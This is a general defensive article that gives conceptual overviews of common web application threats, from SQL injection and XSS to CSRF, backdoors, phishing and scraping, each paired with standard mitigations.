Common threats to web application

Web attacks refer to a category of cyber-attacks that generally occur on or through a website. The most common ones are SQL injection, cross-site scripting, remote file inclusion, and brute force attacks. The risk of attack that each website faces depends on the motive of the attacker, security of the site and the information assets at stake. Regardless of the risk, web admins can follow a best practices approach to securing their sites. The following are among the most serious threats facing web applications.

Injection attacks

An injection attack occurs when an attacker supplies malicious data to an interpreter. The most common injection attack targets SQL databases. In this case, the attacker formulates a command and passes it on the application as data. This can be achieved by either writing the command in an input text-box or including it as part of a URL. A common example is attacking the username/password input boxes with a command string instead of typing in a normal username/password.

If the application is vulnerable, it may process the command giving the attacker some level of control such as retrieving or manipulating data. To protect an application against injection attacks, one can use prepared statements. Prepared statements define all SQL code to be used then parameters can be passed to the query later. This practice helps the database to differentiate data from commands.

Broken authentication

If a system is still using default credentials or insecure session management practices, it may be difficult for it to distinguish between authenticated and non-authorized users. Admins should use multi-factor authentication to make it harder for attackers to misuse stolen credentials. They should also change default credentials, audit passwords and base their password policy on NIST 800-63 B guidelines. Administrators should also create a policy that includes rules for credential recovery and revocation, handling failed login attempts and use server-side session management whenever possible.

how-borken-authentication-works

Image: illustration of session stealing by OWASP

Broken access control

Access control policies enforce resource access levels for different users. A system with broken access control may give a user more permission than they need to fulfill their role. Access control is typically managed through groups, where all users in a group have access to the same functions and content. Because developers tend to overlook the complexity of creating a clear and effective access control policy, they normally end up creating haphazard rules for each user. This situation can make it easier for attackers to discover and exploit weaknesses in the resulting access controls.

One should block path traversal requests that attempt to access resources directly by giving the relative path to a resource. Web developers should also disallow sensitive pages from being cached on users’ browsers to avoid attackers from stealing authenticated sessions.

Backdoor attack

A backdoor attack is one that involves installing malware that can bypass normal system authentication to give the attacker remote access anytime. The attacker then uses the malware to issue commands to the application remotely. The malware can be installed through remote file inclusion Backdoors installed on web servers are typically used to launch distributed DoS attacks, exfiltrate data, and infect users who are visiting that site. They are also commonly used in conducting advanced persistent attacks because they are difficult to detect and can stay in the server for a long time.

Since backdoors are usually installed by exploiting some other weakness such as remote file inclusion, prevention involves addressing vulnerabilities that allow file inclusion. For already infected systems, mitigation involves scanning the server’s filesystem for known malware signatures. This approach is not very reliable due to encryption of the malware of the use of other FUD techniques to conceal its activities. A more effective approach may involve tracking and blocking connection requests to malicious shellcode.

Cross-site request forgery (CSRF)

A cross-site request forgery (CSRF) attack causes the compromised target to perform actions involuntarily while they have a valid session on a web app. It is also known as session riding because it relies on compromising a user with an ongoing session. CSRF attacks can lead users to perform dangerous actions such as transferring funds. If the attack succeeds against an administrator, the whole application can be compromised.

Since this attack is normally used to force the victim to perform some transaction, popular defenses against it have traditionally targeted hardening the business logic. However, this approach and similar ideologies have been shown to be ineffective. Instead, the use of anti-CSRF tokens and same-site cookies can be a more effective defense.

Cross-site scripting (XSS)

A cross-site scripting (XSS) attack involves injecting malicious code into a legitimate website to attempt compromising anyone that visits that site. The attack occurs when the visitor’s web browser loads the script and executes it without noticing that it is malicious. Anyway, the victim’s browser has no way of identifying that the script may cause harm since it will appear to come from a legitimate site. The attacker will usually program the script to steal authentication tokens stored on the victim’s browser, cookies or other cached information they may deem useful.

Preventing XSS attacks requires addressing the vulnerability that allows code injection. Typically, this entails escaping, sanitizing and validating user input. Escaping user input allows the application to avoid interpreting key characters maliciously inserted in the user input. Input validation disallows the use of special characters in user input while input sanitization reformats user input into a harmless form.

Man-in-the-middle attack

A man-in-the-middle attack is used to intercept communication between two communicating parties. There are several forms of the attack including the use of a rogue access point, DNS spoofing and ARP spoofing. Sniffing, packet injection and session hijacking and SSL striping are the most common techniques used to execute this attack.

Since the attack is mostly executed on wireless networks, using strong encryption can help reduce the risk of unwanted parties joining the network. VPNs also offer a secure channel between the communicating nodes that cannot allow a third party. Finally, forcing all traffic from the browser (say, by using plugins) to use HTTPS can render the SSL striping technique unusable.

Phishing attack

Phishing (attack) is the fraudulent practice of attempting to obtain sensitive information through trickery. It involves fooling an unsuspecting user to open an email or message with the ultimate aim of getting them to click on a link or download a file. These links usually lead the user to a fake website where the user is again tricked to provide sensitive information. In the event the user downloads a file, the file will typically bear a payload that will allow the attacker to control the victim’s computer. Although it sounds too silly to fall for, a well-crafted phishing attack can succeed even on technical users. Originally, phishing was executed through email. Today, attackers also use other channels such as instant messaging and SMS. However, email has remained the most prevalent attack channel.

Phishing attacks are among the most dangerous forms of cyber-attacks. A successful compromise can give an attacker the full identity of a victim such as credit card information. The main remedy against phishing is educating users. Informed users are more likely to notice that they are being duped since it is impossible to craft a perfect attack. However, user awareness alone is not enough. Anti-phishing software that uses artificial intelligence can help to further harden user systems.

Remote file inclusion

As the name suggests, this attack involves including a file (usually containing executable code) into the target application. The vulnerability results from allowing unsanitized and untrusted user input into the application. It is somewhat similar to an injection attack the only difference being that a file, instead of code, is being injected. A successful inclusion can cause the web server to execute code on the server or on connected clients, denial of service or spilling of confidential information. PHP-based applications are mostly targeted for this attack due to its ease of including external input. However, any other language that allows the importation of external data into the application.

The primary protection against file inclusion is prohibiting user input to an application’s framework API. However, since this is not always possible, the application can be designed to whitelist files that can be included. Then, identifiers can be used to access a particular file. Using this tactic, the application can block any request that uses an unknown identifier.

Web scraping

Web scraping is the process of extracting the HTML code and data of a website. Bots are normally used to the work. The scraped content is usually used to build a duplicate site to be used for phishing. The attack can lead to loss of intellectual property or espionage if the targeted organization distributes content.

One of the common scraping attacks involves fetching pricing information from competitor websites. Once the attacker has comparative pricing information about a product, they can easily undercut their competitors by pricing their product lower. The attack works effectively against products whose prices can fluctuate easily and customers are only seeking the best bargain.

The other scraping attack involves stealing content such as professional product reviews. It takes an investment for a site to originally obtain such reviews. On the contrary, an attacker can easily and cheaply access all that information by scraping it from the target website. This attack causes severe loss of investments to the target.

It is often difficult to detect that a website is being scrapped maliciously because the same process is used legitimately by search engines to determine content, to perform market research among other rightful purposes. However, protection can involve using a combination of mechanisms that detect and filter bot activity on the site. This may include analyzing traffic behavior and monitoring requests from notorious IP addresses.